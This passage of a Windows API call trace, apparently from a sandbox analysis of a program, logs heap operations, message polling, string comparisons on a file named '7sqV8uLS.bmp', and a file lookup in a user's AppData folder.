lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.664] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.664] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.664] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7sqV8uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sqV8uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qV8uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V8uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uLS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LS.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.666] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7sqV8uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sqV8uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qV8uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V8uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uLS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LS.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.666] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0190.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0190.666] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.666] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0190.667] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.667] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/7sqV8uLS.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e930fb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xb11a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d56f, ftLastWriteTime.dwLowDateTime=0xb11a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d56f, nFileSizeHigh=0x0, nFileSizeLow=0x552a, dwReserved0=0xb4b0039, dwReserved1=0x10aad, cFileName="7sqV8uLS.bmp", cAlternateFileName="")) returned 0xaa5860 [0190.668] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0190.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.669] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0190.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.670] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.670] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.671] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0190.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.671] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.672] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.672] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.672] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.673] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.673] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.673] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0190.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.675] RtlAllocateHeap 